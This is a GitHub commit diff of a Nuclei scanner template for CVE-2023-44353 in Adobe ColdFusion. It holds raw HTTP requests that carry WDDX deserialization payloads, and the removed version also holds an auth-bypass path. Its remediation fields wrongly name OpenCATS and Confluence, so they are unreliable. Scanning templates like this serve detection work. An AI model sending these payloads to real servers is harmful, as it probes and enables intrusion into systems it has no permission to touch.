-
Notifications
You must be signed in to change notification settings - Fork 2.4k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
bc1a965
commit 5b9a2cd
Showing
1 changed file
with
38 additions
and
69 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,113 +1,82 @@ | ||
id: CVE-2023-44353 | ||
|
||
info: | ||
name: Adobe Coldfusion Auth Bypass + Remote Code Execution | ||
name: Adobe ColdFusion WDDX Deserialization Gadgets | ||
author: salts | ||
severity: critical | ||
description: | | ||
Adobe Coldfusion contains a persistent auth bypass issue previously tagged as CVE-2023-29298 and CVE-2023-38205, these ended up being difficult/impossible | ||
to patch, because the fault was actually in the production IIS/Apache connector, where a hard coded rule was put in place. If an administrator ran the | ||
"lockdown" or production installer, this vulnerable path would be exposed to the internet. | ||
Recently, a remote deserialization / code execution flaw CVE-2023-44353 as published with public POC. This template chains the common auth bypass | ||
with the public POC looking for two common folders either C:\windows\ or /etc/. | ||
|
||
|
||
Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction. | ||
remediation: | | ||
To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses the XSS vulnerability. | ||
reference: | ||
- https://nvd.nist.gov/vuln/detail/CVE-2023-44353 | ||
- https://helpx.adobe.com/security/products/coldfusion/apsb23-52.html | ||
- https://research.nccgroup.com/2023/11/21/technical-advisory-adobe-coldfusion-wddx-deserialization-gadgets/#coldfusion-wddx.py | ||
- https://helpx.adobe.com/security/products/coldfusion/apsb23-52.html | ||
remediation: | | ||
Update to the latest version of Confluence | ||
classification: | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 9.8 | ||
cve-id: CVE-2023-44353, CVE-2023-26347 | ||
metadata: | ||
tags: cve,cve2023,adobe,coldfusion,auth-bypass,rce | ||
cve-id: CVE-2023-44353 | ||
cwe-id: CWE-502 | ||
epss-score: 0.00227 | ||
epss-percentile: 0.60906 | ||
cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* | ||
metadata: | ||
verified: true | ||
max-request: 4 | ||
vendor: adobe | ||
product: coldfusion | ||
shodan-query: http.component:"Adobe ColdFusion" | ||
tags: cve,cve2023,adobe,coldfusion | ||
|
||
variables: | ||
version_path: "/hax/..CFIDE/adminapi/administrator.cfc?method=getBuildNumber&_cfclient=true" | ||
version_path: "/CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true" | ||
windows_known_path: "C:\\Windows\\" | ||
windows_bad_path: "C:\\Thisdefinitelydoesnotexist\\" | ||
linux_known_path: "/etc/" | ||
linux_bad_path: "/thesecretcowlevelisreal/" | ||
|
||
http: | ||
- raw: | ||
- | | ||
GET {{version_path}} HTTP/1.1 | ||
Host: {{Hostname}} | ||
|
||
#Windows checks here.. | ||
- | | ||
POST {{version_path}} HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: application/x-www-form-urlencoded | ||
|
||
argumentCollection=<wddxPacket version='1.0'><header/><data><struct type='acoldfusion.tagext.io.cache.CacheTaga'><var name='directory'><string>{{windows_known_path}}</string></var></struct></data></wddxPacket> | ||
argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{windows_known_path}}</string></var></struct></data></wddxPacket> | ||
|
||
- | | ||
POST {{version_path}} HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: application/x-www-form-urlencoded | ||
|
||
argumentCollection=<wddxPacket version='1.0'><header/><data><struct type='acoldfusion.tagext.io.cache.CacheTaga'><var name='directory'><string>{{windows_bad_path}}</string></var></struct></data></wddxPacket> | ||
#Linux checks here.. | ||
argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{windows_bad_path}}</string></var></struct></data></wddxPacket> | ||
|
||
- | | ||
POST {{version_path}} HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: application/x-www-form-urlencoded | ||
argumentCollection=<wddxPacket version='1.0'><header/><data><struct type='acoldfusion.tagext.io.cache.CacheTaga'><var name='directory'><string>{{linux_known_path}}</string></var></struct></data></wddxPacket> | ||
|
||
argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{linux_known_path}}</string></var></struct></data></wddxPacket> | ||
|
||
- | | ||
POST {{version_path}} HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: application/x-www-form-urlencoded | ||
|
||
argumentCollection=<wddxPacket version='1.0'><header/><data><struct type='acoldfusion.tagext.io.cache.CacheTaga'><var name='directory'><string>{{linux_bad_path}}</string></var></struct></data></wddxPacket> | ||
|
||
|
||
cookie-reuse: true | ||
redirects: true | ||
argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{linux_bad_path}}</string></var></struct></data></wddxPacket> | ||
|
||
matchers-condition: or | ||
matchers: | ||
# First stage, I got a version via the auth bypass | ||
- type: dsl | ||
name: CVE-2023-26347 | ||
name: windows | ||
dsl: | ||
- status_code_1 == 200 | ||
- regex('wddxPacket', body_1) | ||
- regex('\\d+,\\d+,\\d+,\\d+', body_1) | ||
condition: and | ||
# Second stage, I check for version success while sending filenames that should always exist on | ||
# the platform | ||
- "status_code_1 == 500 && status_code_2 == 404" | ||
- contains(body_1, "coldfusion.runtime") | ||
condition: and | ||
|
||
# This checks for the vulnerability on windows by sending a check for C:\\Windows\\ and C:\\Thisdefinitelydoesnotexist | ||
# If vulnerable, the different packets should return different results. Specifically the first should | ||
# Return a 500, 404, or canned error message, where the second should return the expected version. | ||
- type: dsl | ||
name: CVE-2023-44353 | ||
dsl: | ||
|
||
- status_code_1 == 200 | ||
- regex('wddxPacket', body_1) | ||
- regex('wddxPacket', body_3) | ||
# I get the version number back from body 1 and body 3, but not body 2 | ||
- regex('\\d+,\\d+,\\d+,\\d+', body_1) | ||
- regex('\\d+,\\d+,\\d+,\\d+', body_3) | ||
- "!regex('\\d+,\\d+,\\d+,\\d+', body_2)" | ||
condition: and | ||
|
||
# This checks for the vulnerability on Linux by sending a check for /etc and /thesecretcowlevelisreal/ | ||
# If vulnerable, the different packets should return different results. Specifically the first should | ||
# Return a 500, 404, or canned error message, where the second should return the expected version. | ||
- type: dsl | ||
name: CVE-2023-44353 | ||
dsl: | ||
|
||
- status_code_1 == 200 | ||
- regex('wddxPacket', body_1) | ||
- regex('wddxPacket', body_5) | ||
# I get the version number back from body 1 and body 3, but not body 2 | ||
- regex('\\d+,\\d+,\\d+,\\d+', body_1) | ||
- regex('\\d+,\\d+,\\d+,\\d+', body_5) | ||
- "!regex('\\d+,\\d+,\\d+,\\d+', body_4)" | ||
condition: and | ||
name: linux | ||
dsl: | ||
- "status_code_3 == 500 && status_code_4 == 404" | ||
- contains(body_3, "coldfusion.runtime") | ||
condition: and |